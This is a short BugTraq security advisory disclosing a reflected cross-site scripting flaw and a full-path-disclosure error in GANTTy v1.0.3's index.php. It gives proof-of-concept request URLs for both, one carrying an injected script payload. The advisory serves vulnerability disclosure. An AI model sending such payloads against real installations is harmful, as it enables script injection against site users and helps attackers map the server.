BugTraq
GANTTy v1.0.3 Jun 06 2006 03:42AM
luny youfucktard com
GANTTy v1.0.3

Homepage:

http://www.gantty.com

Effected files:

index.php

XSS Vulnerabilities PoC:

XSS Vulnerability:

http://www.example.com/index.php?action=login&message=<IMG SRC=javascript:alert('XSS')>+email&lang=

Full path disclosure error:

http://www.example.com/index.php?action=authenticate&lang='

Error: FILE /var/www/username/actions/authenticate.php

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus